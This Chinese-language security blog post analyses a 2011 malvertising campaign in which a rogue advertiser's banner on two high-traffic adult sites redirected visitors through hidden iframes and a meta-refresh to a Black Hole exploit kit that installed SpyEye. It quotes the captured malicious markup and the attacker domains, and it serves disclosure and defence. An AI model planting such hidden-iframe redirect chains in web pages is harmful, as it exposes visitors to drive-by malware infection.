阿碼外傳-阿碼科技非官方中文 Blog: 2011/5/31

2011年5月31日

成人網站擁有大量流量... 及惡意廣告

(作者:Chris Hsiao, NightCola Lin, Wayne Huang)

如果你在下班時間走進我們的辦公室,發現我們很多人都圍繞在Chris.Hsiao的位置附近,而銀幕上顯示的是大量的成人網站及圖片......相信我們正在工作。

在阿碼科技,我們積極的掃描大量的網站以確認其是否有惡意行為,當然我們沒有辦法涵蓋所有的網站,因此我們試著至少能涵蓋那些比較大的網站。當我們建立好這一個平臺之後,我們隨即發現到一個狀況:在其中有好一大部份的比率竟然是那些成人網站(具有相當大的流量)!

隨著我們開始掃描這些網站,即刻發現到了一個現象:除了大量流量以外,這些網站通常也辦隨著惡意廣告(malvertising)。

惡意廣告透過網站(在廣告產業中,我們稱之為publisher)提供給瀏覽者。一些惡意廣告會隨著drive-by download 的行為一起出現,在瀏覽者看到的同時,不需要做任何動作、也不需要去按任何確認鍵,就有被感染的風險。

以下是我們這次的報導:一個惡意廣告商(celeb-escorts.com)是如何讓兩個非常大的成人網站去顯示他所提供的惡意廣告。

第一個網站是:pornhub.com,Alexa排名第62名,每一天有23,873,546個瀏覽者。

相當大的流量!惡意廣告透過廣告仲介(網站與廣告商間的中介,一般稱之為AD network / exchange):etology.com 顯示在pornhub.com上。這幅惡意廣告是由celeb-escorts.com這個廣告商(Advertiser)提供給etology的,而celeb-escorts.com這個網域在今年(2011)五月11日才註冊。因此,種種跡象顯示celeb-escorts.com非常可能是由惡意團體所註冊的,用途是將其惡意廣告散播到整個廣告網路中。下圖是本次事件中相關的網站:

下圖則是事件的主角:惡意廣告本身,透過celeb-escorts所顯示的。在顯示這幅廣告的同時,也會同時產生iframe將瀏覽者導向tun4atta.in,整個惡意行為的起始點。

整個感染鏈及細節如下:

1. http://www.pornhub.com/

2. http://delivery.trafficjunky.net/deliver2.php?zone_id=5&site_id=2&c=frontpage

3. http://delivery.trafficjunky.net/batch/bootstrap-ph-footer/

4. http://delivery.trafficjunky.net/batch.php?&data=%5B%7B%22unique%22%3Atrue%2C%22spots%22%3A%5B%7B%22site%22%3A2%2C%22zone%22%3A27%2C%22element_id%22%3A%22footer1%22%2C%22context%22%3A%22%22%2C%22userContext%22%3A%22%22%7D%2C%7B%22site%22%3A2%2C%22zone%22%3A27%2C%22element_id%22%3A%22footer2%22%2C%22context%22%3A%22%22%2C%22userContext%22%3A%22%22%7D%2C%7B%22site%22%3A2%2C%22zone%22%3A27%2C%22element_id%22%3A%22footer3%22%2C%22context%22%3A%22%22%2C%22userContext%22%3A%22%22%7D%5D%7D%5D&_callback=window.request.onSuccess%28%29

5. http://media.trafficjunky.net/cdn_custom_ads/cpakarll/etologyftsq.html

6. http://pages.etology.com/imp2/93114.php
<html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/><title></title></head><body style="border:0px;margin:0px"><script type="text/javascript">var ad={space:{id:93114,type:2,alignment:2,publisherid:52408,siteid:85149,cobrandingid:1,spacename:'Pornhub 300x250 footer rev',domain:'http%3A%2F%2Fwww%2Epornhub%2Ecom',broker_link:'http://www.etology.com/buying-space-detail.php?id=93114&EID=77408',click_target:'_blank',enable_auto_collapse:'no',style1:{width:300,height:250,rows:1,cols:1,broker_link:'Advertise Here',show_broker_link:'false',background_color:'TRANSPARENT',table_style:'cellspacing=3',border_style:'',title_style:'',description_style:'',broker_link_style:'font-size:11px;font-family:Arial;color:#000000;text-align:center;text-decoration:;font-weight:;font-style:',resize:'false'},style2:{},galleries:[{id:2624,handle:'Jiwon',age:'21',headline:'want my Black Hole?',version_number:'1',media_ext:'gif'},{id:2754,handle:'Bekky',age:'19',headline:'Are thier any single fathers?',version_number:'1',media_ext:'gif'}]},payments:[{link:'http%3A%2F%2F',isAutoCollapseAd:'no',is3rdPartyAd:'true',id:174131,adid:174131,advertiserid:51689,bannerCode:"\074iframe src=http://celeb-escorts.com/banners/300x250.jpg width=\'300\'\r\nheight=\'250\' frameborder=\'0\' scrolling=\'no\' marginheight=0\r\nmarginwidth=0>\074/iframe>",matched_keyword:'',pass_search:''}],proxy_domain:'',clicks:['6f3dff7061a304100b74ca4bbb55a0c0dc36f1d720f4ec84cbd6883f8541ec4c5c28a159f6fc7bd4d7731ac4f29e3654eb845de85231ecf48201be15b98bad226e80eeb5f5e7c9a5']};</script><script type="text/javascript" src='http://media.etology.com/transformer/v41/ads2.js'></script></body></html>

7. http://celeb-escorts.com/banners/300x250.jpg
<a href='http://celeb-escorts.com/' target='_parent'><img src='http://celeb-escorts.com/images/banner-300x250.jpeg'  border=0></a><iframe src='http://tun4atta.in/bcounter.php?u=adult' width='46' height='51' frameborder='0' scrolling='no'></iframe>

8. http://tun4atta.in/bcounter.php?u=adult
<iframe width='34' height='44' frameborder='0' scrolling='no' src='http://iban6duo.in/ts/in.cgi?adult'></iframe>

9. http://iban6duo.in/ts/in.cgi?adult
<html>
<head>
<meta http-equiv="REFRESH" content="1; URL='http://finish.horseretirementhome.com/index.php?tp=452874001a8808fb'">
</head>
<body>
document moved <a href="http://finish.horseretirementhome.com/index.php?tp=452874001a8808fb">here</a>
</body>
</html>

10. http://finish.horseretirementhome.com/index.php?tp=452874001a8808fb
(此即為最後下載並執行的惡意軟體)

這次攻擊者所使用的exploit pack是Black Hole。從我們一開始在五月13日發現後,最後下載並安裝的惡意軟體一直隨著時間在改變。

一開始發現的惡意軟體是 SpyEye,他是一個類似 Zeus 的犯罪軟體(crimeware)。一開始VirusTotal上的偵測率僅有 3/42,至於目前已經有 21/42

目前自動下載並安裝的惡意軟體仍然是 SpyEye,但是有被重新加殼過,因此在VirusTotal上的偵測率僅有 5/42

第二個網站是:tube8.com,Alexa排名第113名,每一天有10,885,350個瀏覽者。

一開始載入的廣告代理商(Traffic Junky (trafficjunky.net))、廣告仲介商(etology.com)都是一樣的。我們實際上也在tube8.com上看到了相同的一幅惡意廣告。

下圖則是本次事件中相關的網站:

整個感染鏈及細節如下:

1. http://tube8.com

2. http://delivery.trafficjunky.net/deliver2.php?zone_id=42&site_id=13&cache=1305558225&c=HomePage

3. http://media.trafficjunky.net/cdn_custom_ads/pornhublive/T8ftphl.html
<iframe src="http://ifa.camads.net/dif/?cid=tube8-footer-950x300" allowtransparency=true width=950 height=300 frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>


4. http://ifa.camads.net/dif/?cid=tube8-footer-950x300

5. http://pages.etology.com/imp2/96244.php

6. http://celeb-escorts.com/banners/300x250.jpg

7. http://tun4atta.in/bcounter.php?u=adult
<iframe width='34' height='44' frameborder='0' scrolling='no' src='http://iban6duo.in/ts/in.cgi?adult'></iframe>

8. http://iban6duo.in/ts/in.cgi?adult
<html>
<head>
<meta http-equiv="REFRESH" content="1; URL='http://finish.horseretirementhome.com/index.php?tp=452874001a8808fb'">
</head>
<body>
document moved <a href="http://finish.horseretirementhome.com/index.php?tp=452874001a8808fb">here</a>
</body>
</html>

9. http://finish.horseretirementhome.com/index.php?tp=452874001a8808fb
(此即為最後下載並執行的惡意軟體)

根據這兩個網站龐大的流量(分別為23,873,54610,885,350),而且從五月13日開我們就一直發現這個惡意廣告的存在,相信截至目前為止,已經有相當大的劉覽者被感染了。

繼續閱讀全文...